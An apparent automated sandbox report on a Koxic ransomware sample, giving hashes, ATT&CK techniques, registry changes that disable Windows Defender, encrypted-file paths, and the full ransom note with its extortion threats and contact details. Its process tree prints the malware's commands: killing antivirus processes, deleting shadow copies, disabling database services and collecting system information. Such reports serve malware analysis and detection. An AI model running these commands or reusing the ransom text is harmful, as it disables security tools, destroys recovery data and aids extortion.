koxic | 699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd

Analysis

max time kernel
121s
max time network
133s
platform
windows10_x64
resource
win10-en-20211208
submitted
21-01-2022 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

enc.exe
Size

156KB
MD5

14ee62fcc9163509856671400429ad55
SHA1

7544332b52769ca853d900669ef5e272a2ae1665
SHA256

699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd
SHA512

4d71c87be6f6ad7c9f3277b60850cd7136cecfd5f15621d1e56b1897008da8cc742578112ea955f8417c8d4cf13bcfb92e7ceafb34720017b47d81c4d2603bff

Score

10^/10

koxic evasion ransomware trojan

Malware Config

Extracted

Path

C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt

Ransom Note

--=== Hello. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. All sensitive information also leaked. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should send sample to us to decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise-time is much more valuable than money. [+] How to contact us? [+] You have two ways: 1) [Recommended] Using an email Just write us an email to [email protected] 2) Quick contact with us or if you will not receive our letters download qTox and ADD our TOXID: F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F How to download QTOX: - https://tox.chat/download.html - https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe Add our mails to contacts so as not to lose letters from us. Check your spam sometimes, our emails may get there. [+] Consequences if we do not find a common language [+] 1. The data were irretrievably lost. 2. Leaked data will be published or sold on blmarket (or to competitors). 3. In some cases, DDOS attacks will be applied to your inftastructure. !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! Your UserID: 3A98C964D38DDD2DAC186F99426E84A88CDB52932837E560A66C729B28A17E3459348400F01D8A014B07FC40DFDF279BACC044D6F10E834B2C775FE86064AE2C45E8497551705FD88DCD0A2C7B619EB0BAB3483B9E5007DF07D5665392F98DEBF2D2B138031744B5F3B5E44BAAD976AC70FB8325A56E8F03ABECBA7D5C8F3914BB665BFCDCE5736B2EB185E4C31C15222BEADFC11833D1D81828D4F423450A129A4B04073A631BD03C214193776A1BADE21B57C620CF9F1F46FECA225131F78A1B17CE28B9C93BDEA7105B3EFCA5844B380F9CDC2FC5F291668A0B0140915D05CF7C9DFC7E3D25C74AE64C2D44B933056E23BA35EEC3165910F7A1F2435FCBED3082010A0282010100C3D725BFC5BA5120D1A121F2BD9803D86802A660AF3F5D048D187F56D3CFA3A9A688A40AE8A9F289556D3C9C549C27BCDBD0DBEB05A86A49C9F303845E6915BE89271EA53C04906870A37E356BD987C95BAC6D3BE981BF9C2D4533A8E5157F91620138F3E1E20CC6EC1BA41E5D04E863CAE5DA17D16CBEB7DD33E5E0E587875C4A04BE18A8F168BC3BCA3308E5699D4A58AB9A3ED5A54FC9594DD263C2A331EDB57C185ABF14CF84DC0250276FC1D983D7F9296C68702314BCF5FE6D4B927A12817B88124E093B1922DB80930AE12675E563936A3A44E5B77481A89A5C70926466AB137521E3C6449E4C03FE0806895F339E4F47EACC9FB503D16FF0B86F60E90203010001E165A86C174F7DF5EC2043486D5A44D04D52545441

Emails

[email protected]

URLs

https://tox.chat/download.html

https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe

Signatures

Koxic
A C++ written ransomware first seen in late 2021.
ransomware koxic
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables taskbar notifications via registry modification
evasion

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1"	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0"	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2"	enc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1"	enc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0"	enc.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\plugin.js.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar.KOXIC_MRTTA	enc.exe
File created	C:\Program Files\Windows Defender\en-US\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File created	C:\Program Files\Windows NT\Accessories\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\id_get.svg.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util-lookup.jar.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.KOXIC_MRTTA	enc.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\illustrations.png.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\TestDrive.ps1.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\ui-strings.js.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sv_get.svg.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\ui-strings.js.KOXIC_MRTTA	enc.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\EnsoUI\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-black\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\PesterState.Tests.ps1.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\Test-Assertion.ps1.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar.KOXIC_MRTTA	enc.exe
File created	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Content\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-369956170-74428499-1628131376-1000-MergedResources-0.pri.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\VOLTAGE.WAV.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_KMS_Client-ul-oob.xrm-ms.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\ui-strings.js.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\ui-strings.js.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar.KOXIC_MRTTA	enc.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft.NET\ADOMD.NET\130\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo.KOXIC_MRTTA	enc.exe
File created	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\holoLens\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\es-ES\msaddsr.dll.mui.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-options.xml.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\jvm.hprof.txt.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.boot.tree.dat.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_partialselected-default_18.svg.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ko-kr\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\SetupTeardown.Tests.ps1.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OFFSYMXL.TTF.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART13.BDR.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_zh_tw_135x40.svg.KOXIC_MRTTA	enc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTrial-pl.xrm-ms.KOXIC_MRTTA	enc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\WANNA_RECOVER_KOXIC_FILEZ_MRTTA.txt	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.KOXIC_MRTTA	enc.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
3992	ipconfig.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
852	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3756	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1644	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3748	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe
2428	enc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3756	taskkill.exe
Token: SeBackupPrivilege	2312	vssvc.exe
Token: SeRestorePrivilege	2312	vssvc.exe
Token: SeAuditPrivilege	2312	vssvc.exe
Token: SeBackupPrivilege	2428	enc.exe
Token: SeRestorePrivilege	2428	enc.exe
Token: SeManageVolumePrivilege	2428	enc.exe
Token: SeTakeOwnershipPrivilege	2428	enc.exe
Token: SeIncreaseQuotaPrivilege	364	WMIC.exe
Token: SeSecurityPrivilege	364	WMIC.exe
Token: SeTakeOwnershipPrivilege	364	WMIC.exe
Token: SeLoadDriverPrivilege	364	WMIC.exe
Token: SeSystemProfilePrivilege	364	WMIC.exe
Token: SeSystemtimePrivilege	364	WMIC.exe
Token: SeProfSingleProcessPrivilege	364	WMIC.exe
Token: SeIncBasePriorityPrivilege	364	WMIC.exe
Token: SeCreatePagefilePrivilege	364	WMIC.exe
Token: SeBackupPrivilege	364	WMIC.exe
Token: SeRestorePrivilege	364	WMIC.exe
Token: SeShutdownPrivilege	364	WMIC.exe
Token: SeDebugPrivilege	364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	364	WMIC.exe
Token: SeRemoteShutdownPrivilege	364	WMIC.exe
Token: SeUndockPrivilege	364	WMIC.exe
Token: SeManageVolumePrivilege	364	WMIC.exe
Token: 33	364	WMIC.exe
Token: 34	364	WMIC.exe
Token: 35	364	WMIC.exe
Token: 36	364	WMIC.exe
Token: SeIncreaseQuotaPrivilege	364	WMIC.exe
Token: SeSecurityPrivilege	364	WMIC.exe
Token: SeTakeOwnershipPrivilege	364	WMIC.exe
Token: SeLoadDriverPrivilege	364	WMIC.exe
Token: SeSystemProfilePrivilege	364	WMIC.exe
Token: SeSystemtimePrivilege	364	WMIC.exe
Token: SeProfSingleProcessPrivilege	364	WMIC.exe
Token: SeIncBasePriorityPrivilege	364	WMIC.exe
Token: SeCreatePagefilePrivilege	364	WMIC.exe
Token: SeBackupPrivilege	364	WMIC.exe
Token: SeRestorePrivilege	364	WMIC.exe
Token: SeShutdownPrivilege	364	WMIC.exe
Token: SeDebugPrivilege	364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	364	WMIC.exe
Token: SeRemoteShutdownPrivilege	364	WMIC.exe
Token: SeUndockPrivilege	364	WMIC.exe
Token: SeManageVolumePrivilege	364	WMIC.exe
Token: 33	364	WMIC.exe
Token: 34	364	WMIC.exe
Token: 35	364	WMIC.exe
Token: 36	364	WMIC.exe
Token: SeIncreaseQuotaPrivilege	520	WMIC.exe
Token: SeSecurityPrivilege	520	WMIC.exe
Token: SeTakeOwnershipPrivilege	520	WMIC.exe
Token: SeLoadDriverPrivilege	520	WMIC.exe
Token: SeSystemProfilePrivilege	520	WMIC.exe
Token: SeSystemtimePrivilege	520	WMIC.exe
Token: SeProfSingleProcessPrivilege	520	WMIC.exe
Token: SeIncBasePriorityPrivilege	520	WMIC.exe
Token: SeCreatePagefilePrivilege	520	WMIC.exe
Token: SeBackupPrivilege	520	WMIC.exe
Token: SeRestorePrivilege	520	WMIC.exe
Token: SeShutdownPrivilege	520	WMIC.exe
Token: SeDebugPrivilege	520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	520	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2428 wrote to memory of 4056	2428	enc.exe	68
PID 2428 wrote to memory of 4056	2428	enc.exe	68
PID 2428 wrote to memory of 4056	2428	enc.exe	68
PID 4056 wrote to memory of 3756	4056	cmd.exe	70
PID 4056 wrote to memory of 3756	4056	cmd.exe	70
PID 4056 wrote to memory of 3756	4056	cmd.exe	70
PID 2428 wrote to memory of 2752	2428	enc.exe	72
PID 2428 wrote to memory of 2752	2428	enc.exe	72
PID 2428 wrote to memory of 2752	2428	enc.exe	72
PID 2752 wrote to memory of 852	2752	cmd.exe	74
PID 2752 wrote to memory of 852	2752	cmd.exe	74
PID 2752 wrote to memory of 852	2752	cmd.exe	74
PID 2428 wrote to memory of 648	2428	enc.exe	76
PID 2428 wrote to memory of 648	2428	enc.exe	76
PID 2428 wrote to memory of 648	2428	enc.exe	76
PID 2428 wrote to memory of 3996	2428	enc.exe	79
PID 2428 wrote to memory of 3996	2428	enc.exe	79
PID 2428 wrote to memory of 3996	2428	enc.exe	79
PID 3996 wrote to memory of 364	3996	cmd.exe	80
PID 3996 wrote to memory of 364	3996	cmd.exe	80
PID 3996 wrote to memory of 364	3996	cmd.exe	80
PID 2428 wrote to memory of 1328	2428	enc.exe	81
PID 2428 wrote to memory of 1328	2428	enc.exe	81
PID 2428 wrote to memory of 1328	2428	enc.exe	81
PID 2428 wrote to memory of 1140	2428	enc.exe	83
PID 2428 wrote to memory of 1140	2428	enc.exe	83
PID 2428 wrote to memory of 1140	2428	enc.exe	83
PID 1140 wrote to memory of 520	1140	cmd.exe	85
PID 1140 wrote to memory of 520	1140	cmd.exe	85
PID 1140 wrote to memory of 520	1140	cmd.exe	85
PID 2428 wrote to memory of 3592	2428	enc.exe	86
PID 2428 wrote to memory of 3592	2428	enc.exe	86
PID 2428 wrote to memory of 3592	2428	enc.exe	86
PID 2428 wrote to memory of 1928	2428	enc.exe	88
PID 2428 wrote to memory of 1928	2428	enc.exe	88
PID 2428 wrote to memory of 1928	2428	enc.exe	88
PID 1928 wrote to memory of 2160	1928	cmd.exe	90
PID 1928 wrote to memory of 2160	1928	cmd.exe	90
PID 1928 wrote to memory of 2160	1928	cmd.exe	90
PID 2428 wrote to memory of 1684	2428	enc.exe	91
PID 2428 wrote to memory of 1684	2428	enc.exe	91
PID 2428 wrote to memory of 1684	2428	enc.exe	91
PID 2428 wrote to memory of 1872	2428	enc.exe	93
PID 2428 wrote to memory of 1872	2428	enc.exe	93
PID 2428 wrote to memory of 1872	2428	enc.exe	93
PID 1872 wrote to memory of 1960	1872	cmd.exe	95
PID 1872 wrote to memory of 1960	1872	cmd.exe	95
PID 1872 wrote to memory of 1960	1872	cmd.exe	95
PID 2428 wrote to memory of 3432	2428	enc.exe	96
PID 2428 wrote to memory of 3432	2428	enc.exe	96
PID 2428 wrote to memory of 3432	2428	enc.exe	96
PID 2428 wrote to memory of 2172	2428	enc.exe	98
PID 2428 wrote to memory of 2172	2428	enc.exe	98
PID 2428 wrote to memory of 2172	2428	enc.exe	98
PID 2172 wrote to memory of 3508	2172	cmd.exe	100
PID 2172 wrote to memory of 3508	2172	cmd.exe	100
PID 2172 wrote to memory of 3508	2172	cmd.exe	100
PID 2428 wrote to memory of 2368	2428	enc.exe	101
PID 2428 wrote to memory of 2368	2428	enc.exe	101
PID 2428 wrote to memory of 2368	2428	enc.exe	101
PID 2428 wrote to memory of 2928	2428	enc.exe	103
PID 2428 wrote to memory of 2928	2428	enc.exe	103
PID 2428 wrote to memory of 2928	2428	enc.exe	103
PID 2928 wrote to memory of 3216	2928	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\enc.exe
"C:\Users\Admin\AppData\Local\Temp\enc.exe"
1⤵
- Windows security modification
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM MSASCuiL.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo OS INFO: > %TEMP%\DARHQFOMK"
  2⤵
  PID:648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\DARHQFOMK"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic OS get Caption,CSDVersion,OSArchitecture,Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo BIOS INFO: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\DARHQFOMK"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo CPU INFO: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:3592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\DARHQFOMK"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
    3⤵
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\DARHQFOMK"
  2⤵
  PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\DARHQFOMK"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMPHYSICAL get MaxCapacity
    3⤵
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\DARHQFOMK"
  2⤵
  PID:3432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\DARHQFOMK"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2172
